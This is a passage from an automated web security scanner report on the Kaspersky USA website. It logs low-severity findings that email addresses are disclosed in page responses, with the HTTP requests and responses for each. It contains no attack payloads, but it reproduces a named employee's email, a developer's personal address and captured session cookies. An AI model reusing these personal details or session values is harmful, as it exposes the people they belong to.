Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:04:17 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145057"
Content-Type: text/html; charset=utf-8
Content-Length: 37058
Date: Sun, 04 Sep 2011 14:04:24 GMT
X-Varnish: 1163241500
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<a href="mailto:newvirus@kaspersky.com">
...[SNIP]...

19.34. http://usa.kaspersky.com/node/12354/lightbox2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/12354/lightbox2

Issue detail

The following email address was disclosed in the response:

katelyn.fogarty@kaspersky.com

Request

Response

19.35. http://usa.kaspersky.com/node/17007 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/17007

Issue detail

The following email addresses were disclosed in the response:

katelyn.fogarty@kaspersky.com
newvirus@kaspersky.com

Request

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:27:32 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315139252"
Content-Type: text/html; charset=utf-8
Content-Length: 36720
Date: Sun, 04 Sep 2011 12:27:44 GMT
X-Varnish: 1163058525
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<meta property="og:email" content="katelyn.fogarty@kaspersky.com" />
...[SNIP]...
<a href="mailto:newvirus@kaspersky.com">
...[SNIP]...

19.36. http://usa.kaspersky.com/node/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/index.html

Issue detail

The following email address was disclosed in the response:

newvirus@kaspersky.com

Request

GET /node/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:04:13 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145053"
Content-Type: text/html; charset=utf-8
Content-Length: 30403
Date: Sun, 04 Sep 2011 14:04:16 GMT
X-Varnish: 1163241251
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<a href="mailto:newvirus@kaspersky.com">
...[SNIP]...

19.37. http://usa.kaspersky.com/products-services/home-computer-security/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/index.html

Issue detail

The following email address was disclosed in the response:

newvirus@kaspersky.com

Request

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:04:13 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145053"
Content-Type: text/html; charset=utf-8
Content-Length: 40945
Date: Sun, 04 Sep 2011 14:04:16 GMT
X-Varnish: 1163241206
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<a href="mailto:newvirus@kaspersky.com">
...[SNIP]...

19.38. http://usa.kaspersky.com/products-services/home-computer-security/internet-security previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/internet-security

Issue detail

The following email addresses were disclosed in the response:

katelyn.fogarty@kaspersky.com
newvirus@kaspersky.com

Request

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:26:15 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315139175"
Content-Type: text/html; charset=utf-8
Content-Length: 109002
Date: Sun, 04 Sep 2011 12:26:43 GMT
X-Varnish: 1163056581
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<meta property="og:email" content="katelyn.fogarty@kaspersky.com" />
...[SNIP]...
<a href="mailto:newvirus@kaspersky.com">
...[SNIP]...

19.39. http://usa.kaspersky.com/products-services/home-computer-security/mobile-security previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/mobile-security

Issue detail

The following email addresses were disclosed in the response:

katelyn.fogarty@kaspersky.com
newvirus@kaspersky.com

Request

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:26:42 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315139202"
Content-Type: text/html; charset=utf-8
Content-Length: 77836
Date: Sun, 04 Sep 2011 12:27:00 GMT
X-Varnish: 1163057207
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<meta property="og:email" content="katelyn.fogarty@kaspersky.com" />
...[SNIP]...
<a href="mailto:newvirus@kaspersky.com">
...[SNIP]...

19.40. http://usa.kaspersky.com/products-services/home-computer-security/pure previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/pure

Issue detail

The following email addresses were disclosed in the response:

katelyn.fogarty@kaspersky.com
newvirus@kaspersky.com

Request

Response

19.41. http://usa.kaspersky.com/products-services/home-computer-security/tablet-security previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/tablet-security

Issue detail

The following email addresses were disclosed in the response:

katelyn.fogarty@kaspersky.com
newvirus@kaspersky.com

Request

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:35:38 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315139738"
Content-Type: text/html; charset=utf-8
Content-Length: 49404
Date: Sun, 04 Sep 2011 12:35:59 GMT
X-Varnish: 1163071400
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<meta property="og:email" content="katelyn.fogarty@kaspersky.com" />
...[SNIP]...
<a href="mailto:newvirus@kaspersky.com">
...[SNIP]...

19.42. http://usa.kaspersky.com/resources/knowledge-center/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/resources/knowledge-center/index.html

Issue detail

The following email address was disclosed in the response:

newvirus@kaspersky.com

Request

GET /resources/knowledge-center/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:04:22 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145062"
Content-Type: text/html; charset=utf-8
Content-Length: 36942
Date: Sun, 04 Sep 2011 14:04:30 GMT
X-Varnish: 1163241755
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<a href="mailto:newvirus@kaspersky.com">
...[SNIP]...

19.43. http://usa.kaspersky.com/resources/knowledge-center/whitepapers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/resources/knowledge-center/whitepapers

Issue detail

The following email addresses were disclosed in the response:

katelyn.fogarty@kaspersky.com
newvirus@kaspersky.com

Request

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:30:59 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315139459"
Content-Type: text/html; charset=utf-8
Content-Length: 54170
Date: Sun, 04 Sep 2011 12:31:08 GMT
X-Varnish: 1163064132
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<meta property="og:email" content="katelyn.fogarty@kaspersky.com" />
...[SNIP]...
<a href="mailto:newvirus@kaspersky.com">
...[SNIP]...

19.44. http://usa.kaspersky.com/search/apachesolr_search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search

Issue detail

The following email address was disclosed in the response:

newvirus@kaspersky.com

Request

GET /search/apachesolr_search HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:04:37 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145077"
Content-Type: text/html; charset=utf-8
Content-Length: 29455
Date: Sun, 04 Sep 2011 14:04:45 GMT
X-Varnish: 1163242354
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<a href="mailto:newvirus@kaspersky.com">
...[SNIP]...

19.45. http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/far%20help%20virus

Issue detail

The following email address was disclosed in the response:

newvirus@kaspersky.com

Request

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:25:35 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315139135"
Content-Type: text/html; charset=utf-8
Content-Length: 37531
Date: Sun, 04 Sep 2011 12:25:51 GMT
X-Varnish: 1163055428
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<a href="mailto:newvirus@kaspersky.com">
...[SNIP]...

19.46. http://usa.kaspersky.com/search/apachesolr_search/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/index.html

Issue detail

The following email address was disclosed in the response:

newvirus@kaspersky.com

Request

GET /search/apachesolr_search/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:04:36 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145076"
Content-Type: text/html; charset=utf-8
Content-Length: 30322
Date: Sun, 04 Sep 2011 14:04:48 GMT
X-Varnish: 1163242323
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<a href="mailto:newvirus@kaspersky.com">
...[SNIP]...

19.47. http://usa.kaspersky.com/search/apachesolr_search/xss previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/xss

Issue detail

The following email address was disclosed in the response:

newvirus@kaspersky.com

Request

Response

19.48. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js/js_30f49f3054e7146ae0b18ae409f59641.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/js/js_30f49f3054e7146ae0b18ae409f59641.js

Issue detail

The following email address was disclosed in the response:

letssurf@gmail.com

Request

GET /sites/usa.kaspersky.com/files/js/js_30f49f3054e7146ae0b18ae409f59641.js HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/pure?ICID=INT1673886
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE; NO_CACHE=Y; gpv_pageName=Homepage; s_nr=1315139049879-New

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sat, 03 Sep 2011 18:09:10 GMT
ETag: "31285ae-40510-4ac0d5fe15d80"
Cache-Control: max-age=1209600
Expires: Sun, 18 Sep 2011 12:20:48 GMT
Content-Type: application/x-javascript
Content-Length: 263440
Date: Sun, 04 Sep 2011 12:23:36 GMT
X-Varnish: 1163052074 1163047116
Age: 168
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: HIT

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
elect.js
/**
* .disableTextSelect - Disable Text Select Plugin
*
* Version: 1.1
* Updated: 2007-11-28
*
* Used to stop users from selecting text
*
* Copyright (c) 2007 James Dempster (letssurf@gmail.com, http://www.jdempster.com/category/jquery/disabletextselect/)
*
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
**/

/**
* Requirements:
* - jQuery
...[SNIP]...

19.49. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js/js_46af8f68c2630fc751ed0418c2209a90.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/js/js_46af8f68c2630fc751ed0418c2209a90.js

Issue detail

The following email address was disclosed in the response:

letssurf@gmail.com

Request

GET /sites/usa.kaspersky.com/files/js/js_46af8f68c2630fc751ed0418c2209a90.js HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE; NO_CACHE=Y; gpv_pageName=Homepage; s_nr=1315139049879-New

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sat, 03 Sep 2011 17:59:27 GMT
ETag: "3128132-321d6-4ac0d3d217dc0"
Cache-Control: max-age=1209600
Expires: Sun, 18 Sep 2011 11:59:40 GMT
Content-Type: application/x-javascript
Content-Length: 205270
Date: Sun, 04 Sep 2011 12:23:37 GMT
X-Varnish: 1163052092 1163017224
Age: 1437
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: HIT

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
elect.js
/**
* .disableTextSelect - Disable Text Select Plugin
*
* Version: 1.1
* Updated: 2007-11-28
*
* Used to stop users from selecting text
*
* Copyright (c) 2007 James Dempster (letssurf@gmail.com, http://www.jdempster.com/category/jquery/disabletextselect/)
*
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
**/

/**
* Requirements:
* - jQuery
...[SNIP]...

19.50. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js/js_5a9a5376d71ae1646a25b8ca6f6918ac.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/js/js_5a9a5376d71ae1646a25b8ca6f6918ac.js

Issue detail

The following email address was disclosed in the response:

letssurf@gmail.com

Request

GET /sites/usa.kaspersky.com/files/js/js_5a9a5376d71ae1646a25b8ca6f6918ac.js HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sat, 03 Sep 2011 17:59:35 GMT
ETag: "3128559-3ea8b-4ac0d3d9b8fc0"
Cache-Control: max-age=1209600
Expires: Sun, 18 Sep 2011 11:50:59 GMT
Content-Type: application/x-javascript
Content-Length: 256651
Date: Sun, 04 Sep 2011 12:14:00 GMT
X-Varnish: 1163036388 1163006783
Age: 1381
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: HIT

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
elect.js
/**
* .disableTextSelect - Disable Text Select Plugin
*
* Version: 1.1
* Updated: 2007-11-28
*
* Used to stop users from selecting text
*
* Copyright (c) 2007 James Dempster (letssurf@gmail.com, http://www.jdempster.com/category/jquery/disabletextselect/)
*
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
**/

/**
* Requirements:
* - jQuery
...[SNIP]...

19.51. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js/js_6e74c2e98f0fbe5a3612ed82de36fc7c.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/js/js_6e74c2e98f0fbe5a3612ed82de36fc7c.js

Issue detail

The following email address was disclosed in the response:

letssurf@gmail.com

Request

GET /sites/usa.kaspersky.com/files/js/js_6e74c2e98f0fbe5a3612ed82de36fc7c.js HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/internet-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139084465-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fresources%25252Fknowledge-center%25252Fwhitepapers%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sat, 03 Sep 2011 17:59:38 GMT
ETag: "3128566-3fe9a-4ac0d3dc95680"
Cache-Control: max-age=1209600
Expires: Sun, 18 Sep 2011 12:22:37 GMT
Content-Type: application/x-javascript
Content-Length: 261786
Date: Sun, 04 Sep 2011 12:24:07 GMT
X-Varnish: 1163052987 1163050582
Age: 90
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: HIT

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
elect.js
/**
* .disableTextSelect - Disable Text Select Plugin
*
* Version: 1.1
* Updated: 2007-11-28
*
* Used to stop users from selecting text
*
* Copyright (c) 2007 James Dempster (letssurf@gmail.com, http://www.jdempster.com/category/jquery/disabletextselect/)
*
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
**/

/**
* Requirements:
* - jQuery
...[SNIP]...

19.52. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js/js_a4d3545defa8bc26011651e729544348.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/js/js_a4d3545defa8bc26011651e729544348.js

Issue detail

The following email address was disclosed in the response:

letssurf@gmail.com

Request

GET /sites/usa.kaspersky.com/files/js/js_a4d3545defa8bc26011651e729544348.js HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; NO_CACHE=Y; s_cc=true; intcamp=INT1673886; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139061299-New; slider_session=yes

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sat, 03 Sep 2011 17:59:58 GMT
ETag: "312856d-329f7-4ac0d3efa8380"
Cache-Control: max-age=1209600
Expires: Sun, 18 Sep 2011 12:22:05 GMT
Content-Type: application/x-javascript
Content-Length: 207351
Date: Sun, 04 Sep 2011 12:23:47 GMT
X-Varnish: 1163052532 1163049581
Age: 102
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: HIT

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
elect.js
/**
* .disableTextSelect - Disable Text Select Plugin
*
* Version: 1.1
* Updated: 2007-11-28
*
* Used to stop users from selecting text
*
* Copyright (c) 2007 James Dempster (letssurf@gmail.com, http://www.jdempster.com/category/jquery/disabletextselect/)
*
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
**/

/**
* Requirements:
* - jQuery
...[SNIP]...

19.53. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js/js_d4f653caa3cf2cb11ec0b051827bac22.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/js/js_d4f653caa3cf2cb11ec0b051827bac22.js

Issue detail

The following email address was disclosed in the response:

letssurf@gmail.com

Request

GET /sites/usa.kaspersky.com/files/js/js_d4f653caa3cf2cb11ec0b051827bac22.js HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/node/12354/lightbox2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139100971-New; s_sq=kaspersky-usa%3D%2526pid%253DStore%252520%25257C%252520Home%252520Users%252520%25257C%252520Kaspersky%252520Store%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257B%252524('%252523pure-users-3y-prices').show()%25253B%252524('%252523pure-users-2y-prices').hide()%25253B%252524('%252523pure-%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sat, 03 Sep 2011 18:00:25 GMT
ETag: "312858c-324f7-4ac0d40968040"
Cache-Control: max-age=1209600
Expires: Sun, 18 Sep 2011 12:13:09 GMT
Content-Type: application/x-javascript
Content-Length: 206071
Date: Sun, 04 Sep 2011 12:24:33 GMT
X-Varnish: 1163053697 1163034992
Age: 684
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: HIT

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
elect.js
/**
* .disableTextSelect - Disable Text Select Plugin
*
* Version: 1.1
* Updated: 2007-11-28
*
* Used to stop users from selecting text
*
* Copyright (c) 2007 James Dempster (letssurf@gmail.com, http://www.jdempster.com/category/jquery/disabletextselect/)
*
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
**/

/**
* Requirements:
* - jQuery
...[SNIP]...

19.54. http://usa.kaspersky.com/store/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
